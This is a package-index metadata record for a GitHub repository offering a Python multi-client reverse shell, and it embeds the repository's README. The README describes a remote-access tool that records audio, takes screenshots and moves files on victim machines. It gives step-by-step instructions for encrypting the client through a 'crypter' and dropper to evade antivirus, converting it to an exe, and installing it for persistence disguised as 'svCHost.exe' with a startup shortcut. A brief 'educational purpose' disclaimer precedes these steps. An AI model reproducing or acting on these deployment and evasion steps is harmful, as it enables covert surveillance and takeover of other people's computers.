{"id":16418532,"url":"https://github.com/yashsahsani/multiclient-reverse-shell","last_synced_at":"2025-03-23T06:31:38.077Z","repository":{"id":38432502,"uuid":"291630623","full_name":"YashSahsani/Multiclient-Reverse-shell","owner":"YashSahsani","description":"Reverse shell using socket programming in python","archived":false,"fork":false,"pushed_at":"2022-12-08T11:27:53.000Z","size":63,"stargazers_count":15,"open_issues_count":5,"forks_count":5,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-03-01T22:52:25.055Z","etag":null,"topics":["antivirus-evasion","backdoor","bypass","dropper","evasion","malware","python","reverse","socket-programming","startup","windows"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/YashSahsani.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-08-31T06:13:23.000Z","updated_at":"2024-06-03T02:18:33.000Z","dependencies_parsed_at":"2023-01-25T12:31:14.476Z","dependency_job_id":null,"html_url":"https://github.com/YashSahsani/Multiclient-Reverse-shell","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/YashSahsani%2FMulticlient-Reverse-shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/YashSahsani%2FMulticlient-Reverse-shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/YashSahsani%2FMulticlient-Reverse-shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/YashSahsani%2FMulticlient-Reverse-shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/YashSahsani","download_url":"https://codeload.github.com/YashSahsani/Multiclient-Reverse-shell/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":244281287,"owners_count":20427809,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["antivirus-evasion","backdoor","bypass","dropper","evasion","malware","python","reverse","socket-programming","startup","windows"],"created_at":"2024-10-11T07:14:23.917Z","updated_at":"2025-03-23T06:31:37.664Z","avatar_url":"https://github.com/YashSahsani.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Disclaimer\n\nThis is just for educational purpose only.This reverse shell should only be used in the lawful, remote administration of authorized systems. Accessing a computer network without authorization or permission is illegal.Do not attempt to violate the law with anything contained here.We will not be responsible for your any illegal actions.\n***\n# Multiclient-Reverse-shell\nReverse shell using socket programming in python.\nWith features like sound recording, screenshot,upload and download files.\n***\n# Prerequisite\n* python 3.7.x\n***\n# How to Use\n\nTo use this reverse shell, two scripts need to be running\n\n* **server/server.py** - runs on server and waits for clients to connect.(listens on 4444 port)\n* **client/client.py** - connects to a remote server.\n\n***\n\n## Server\n\nTo set up server script, simply run **server.py**.\\\n`python server.py`\\\nYou will get an interactive prompt.\\\nTo list all current connections:\\\n`shell\u003e list`\\\nTo select a target from the list of clients:\\\n`shell\u003e select 0`\n\n***\n\n## Client\n\nIn **client.py** , simply run or change the ip address of the server in the client.py file.\n`python client.py`\n***\n## For obfuscation\n$ cd crypter\\\n$ python crypter.py ../client/client.py \\\nwhich will create a encrypted payload using fernet encryption method.\\\n$ type encrypted_payload.txt (copy this) \\\nTo execute encrypted payload use dropper.py.\\\nchange the value of data variable in dropper.py file with the encrypted_payload.txt content.\\\nThan run:\\\n$python dropper.py\n***\n## Create Exe file.\nTo Create exe file of client.py run auto_py_to_exe command in terminal.\n***\n## To run at startup (Windows os)\n$copy Run_at_Startup/run_at_startup.py Run_at_Startup/copy.py\\\n$copy Run_at_Startup/client_payload.py Run_at_Startup/svCHost.py\\\n$cd crypter\\\n$python crypter.py ../Run_at_Startup/copy.py\\\nwhich will create a encrypted_payload.txt.(copy its content)\\\nchange the value of data variable in dropper/dropper.py file with the encrypted_payload.txt content.\\\n$copy dropper.py copy.py\\\nAnd than create its exe\\\n$python crypter.py ../Run_at_Startup/svCHost.py\\\nwhich will create a encrypted_payload.txt (copy its content).\\\nchange the value of data variable in dropper/dropper.py file with the encrypted_payload.txt content.\\\n$copy dropper.py svCHost.py\\\nAnd than create its exe.\n\nTo put both the exe at some location and just run copy.exe to it will copy the svCHost.exe in C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Microsoft or C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Microsoft\\office and creates its shortcut in startup folder.\n***\n# Pyaudio error\ntry this:\\\n$pipwin install pyaudio\\\nor\\\nrefer to this:https://stackoverflow.com/questions/52283840/i-cant-install-pyaudio-on-windows-how-to-solve-error-microsoft-visual-c-14\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyashsahsani%2Fmulticlient-reverse-shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fyashsahsani%2Fmulticlient-reverse-shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fyashsahsani%2Fmulticlient-reverse-shell/lists"}